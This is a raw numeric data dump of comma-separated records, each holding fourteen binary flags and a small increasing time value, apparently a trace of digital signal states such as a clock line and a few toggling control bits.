0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3456632e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3456660e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3456684e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3456708e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3456732e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3456756e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3456788e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3456812e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3456836e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3456860e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3456884e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3456908e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3456936e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3456960e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3456988e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3457012e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3457036e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3457060e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3457084e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3457108e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3457136e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3457160e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3457188e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3457212e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3457236e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3457260e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3457284e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3457308e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3457336e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3457360e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3457388e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3457412e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3457436e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3457460e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3457484e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3457508e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3457536e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3457560e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3457588e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3457612e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3457636e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3457660e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3457684e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3457708e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3457736e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.3457740e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.3457760e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.3457788e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.3457812e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.3457836e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.3457860e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.3457884e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.3457908e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.3457936e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.3457960e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.3457988e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.3458012e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.3458036e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3458044e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3458060e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3458084e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3458108e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3458136e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3458160e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3458188e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3458212e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3458236e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3458260e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3458284e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3458308e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3458336e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3458360e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3458388e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3458412e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3458436e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3458460e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3458484e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3458508e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3458536e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3458560e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3458588e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3458612e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3458636e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3458660e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3458684e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3458708e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3458736e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3458760e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3458788e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3458812e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3458836e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3458860e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3458884e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3458908e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3458936e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3458960e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3458988e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3459012e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3459036e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3459060e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3459084e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3459108e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3459136e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.3459140e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.3459160e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.3459188e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.3459212e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.3459236e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.3459260e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.3459284e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.3459308e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.3459336e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.3459360e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.3459388e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.3459412e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.3459436e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3459444e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3459460e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3459484e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3459508e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3459536e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3459560e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3459588e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3459612e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3459636e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3459660e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3459684e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3459708e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3459736e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3459760e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3459788e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3459812e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3459836e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3459860e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3459884e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3459908e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3459936e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3459960e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3459988e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3460012e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3460036e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3460060e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3460084e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3460108e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3460136e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3460160e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.3460188e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.3460212e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.3460236e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.3460260e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.3460284e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.3460308e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.3460336e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.3460360e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.3460388e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.3460412e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.3460436e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.3460460e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.3460484e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3460492e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3460508e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3460536e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3460560e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3460588e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3460612e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3460636e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3460660e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3460684e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3460708e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3460736e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3460760e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3460788e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3460812e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3460836e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3460860e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3460884e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3460908e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3460936e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3460960e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3460988e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3461012e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3461036e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3461060e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3461084e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3461108e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3461136e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3461160e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3461188e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3461212e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3461236e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3461260e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3461284e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3461308e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3461336e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3461360e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3461388e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3461412e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3461436e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3461460e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3461484e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3461508e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3461536e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3461580e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3461608e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3461632e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3461660e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3461684e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3461708e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,1.3586652e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,1.3586844e-02 1,1,1,0,1,0,0,0,0,0,0,1,0,1,1.3586876e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,1.3586900e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,1.3587180e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,1.3587208e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,1.3587228e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,1.3587256e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,1.3587280e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,1.3587308e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,1.3587332e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,1.3587356e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,1.3587380e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,1.3587404e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,1.3587428e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,1.3587456e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,1.3587480e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3587484e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3587508e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3587532e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3587556e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3587580e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3587604e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3587628e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3587656e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3587680e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3587708e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3587732e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3587756e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3587780e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3587804e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3587828e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3587856e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3587880e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3587908e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3587932e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3587956e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3587980e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3588004e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3588028e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3588056e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3588080e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3588108e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3588132e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3588156e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3588180e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3588204e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3588228e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3588256e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3588280e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3588308e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3588332e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3588356e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3588380e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3588404e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3588428e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3588456e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3588508e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3588532e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3588556e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3588580e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3588632e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3588656e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3588708e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3588732e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3588780e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3588804e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3588856e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3588880e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3588932e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3588956e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3589004e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3589028e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3589056e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3589080e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3589108e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3589132e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3589156e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3589180e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3589204e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3589228e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3589256e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3589280e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3589308e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3589332e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3589356e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3589380e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3589404e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3589428e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3589484e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3589508e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3589532e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3589556e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3589580e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3589604e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3589628e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3589656e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3589680e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3589708e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3589732e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3589756e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3589780e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3589804e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3589828e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3589856e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3589880e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3589908e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3589932e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3589956e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3589980e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3590004e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3590056e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3590080e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3590108e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3590132e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3590156e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3590180e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3590204e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3590228e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3590256e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3590280e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3590308e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3590332e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3590356e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3590380e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3590404e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3590428e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3590456e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3590480e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3590508e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3590532e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3590556e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3590580e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3590604e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3590628e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3590656e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3590680e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3590708e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3590732e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3590756e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3590780e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3590804e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3590828e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3590856e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3590880e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3590908e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3590932e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3590956e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3590980e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3591004e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3591028e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3591056e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3591080e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3591108e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3591132e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3591156e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3591180e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3591204e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3591228e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3591256e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3591280e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3591308e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3591332e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3591356e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3591380e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3591404e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3591428e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3591456e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3591480e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3591508e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3591532e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3591556e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3591580e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3591604e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3591628e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3591656e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3591680e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3591708e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3591732e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3591756e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3591780e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3591804e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3591828e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3591856e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3591880e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3591908e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3591932e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3591956e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3591980e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3592004e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3592028e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3592056e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3592080e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3592108e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3592132e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3592156e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3592180e-02 